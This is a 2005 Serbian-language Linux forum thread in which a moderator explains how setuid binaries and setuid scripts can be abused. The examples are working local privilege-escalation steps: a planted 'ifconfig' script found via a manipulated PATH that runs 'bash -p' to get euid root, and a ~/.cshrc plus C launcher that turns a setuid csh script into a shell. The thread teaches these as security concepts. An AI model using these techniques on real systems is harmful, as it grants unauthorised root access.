Početak›Forumi›Linuks›Opšte Linuks diskusije›Suid bit i tekstualne datoteke
- This topic has 51 odgovor, 9 glasova, and was last updated 18 years, 3 months ranije by maddox.
-
AutorČlanci
-
1. decembar 2005. u 9:55 pm #37912japanUčesnik
uh… predajem se… 😆
kako prevariti strcmp() ?
1. decembar 2005. u 10:19 pm #37913popeyeGlavni majstorTražio si zeca u pogrešnom grmu. 😉
ifconfig:[code]#!/bin/bash -p
. /bin/bash -p[/code]
$ vi ifconfig
$ chmod 755 ifconfig
$ PATH=”.” ./a.out eth0
# id
uid=1000(popeye) gid=1000(popeye) euid=0(root)1. decembar 2005. u 10:27 pm #37914popeyeGlavni majstorza ovo već nisam siguran, možda neki ” ili tako nešto…
Nije mi cilj bio da pričam o prelivanju bafera, to je malo duža (i komplikovanija za neupućene) tema. Ovo oko skripti, odnosno system() funkcije, je lakše za poimanje.
1. decembar 2005. u 10:44 pm #37915japanUčesnikTražio si zeca u pogrešnom grmu. 😉
znao sam da je neka koska 😛
nije ni prelivanje bafera mnogo teško za shvatiti, samo je potrebno znati kako funkcioniše izvršavanje programa na nivou procesora… a to se uz dobru literaturu lako da naučiti…
1. decembar 2005. u 10:57 pm #37916popeyeGlavni majstorMa stoji da je prosto, ali ni ovde se niko ne javlja. Pre nekog vremena je neko jednom tražio otvaranje foruma “Sigurnost” i tom prilikom sam odgovorio da za takvim forumom nema dovoljno korisnika koji bi učestvovali u nekoj normalnoj diskusiji. Danas sam malo zaludniji pa iskoristih ovu temu da vidim kako stoje stvari.
1. decembar 2005. u 11:10 pm #37917LimitManUčesnikMene zanima … Mada stvarno nemam snage za vecu raspravu (neispavan, radio previse i sl…). Samo vas gledam i iskreno … saznajem neke nove stvari 😉 Mada je dosta tu i starih …
1. decembar 2005. u 11:14 pm #37918popeyeGlavni majstorznao sam da je neka koska 😛
Hehe, ima puna korpa koski.
Šta misliš, u čemu je problem u ovoj skripti:
[code]#!/bin/csh
echo “Test!”[/code]
Pod pretpostavkom da je je vlasnik root, dozvole su 4755 i sistem poštuje suid bit na skripti, može li se dobiti root shell?
1. decembar 2005. u 11:24 pm #37919LimitManUčesnikzaista ne vidim kako bi “Hello world” primer mogao da bude access to root preko suid-a …
Ako je to moguce … onda je sve moguce 😀
1. decembar 2005. u 11:45 pm #37920japanUčesnikpomoslio sam da je dovoljno uraditi isto što i malopre, ali izgleda da nije…
2. decembar 2005. u 1:32 am #37921popeyeGlavni majstor~/.cshrc:
[code]/bin/bash -p[/code]pokretac.c:
[code]#includeint main() {
execl(“test.sh”,”-“,0);
return 0;}
[/code]$ vi ~/.cshrc
$ vi pokretac.c
$ make pokretac
$ ./pokretac.c
$ ps
PID TTY TIME CMD
26292 pts/0 00:00:00 bash
26370 pts/0 00:00:00 test.sh
26371 pts/0 00:00:00 bash
26380 pts/0 00:00:00 psKao što vidiš, dve instance bash školjke su pokrenute. Izlaskom iz tako dobijenog shella, izvršava se test.sh (ispisuje se “Test!”). Kada bi sistem dozvolio suid za skriptu, ovo bi trebao biti root shell.
-
AutorČlanci
Moraš biti prijavljen da bi postavio komentar u ovoj temi.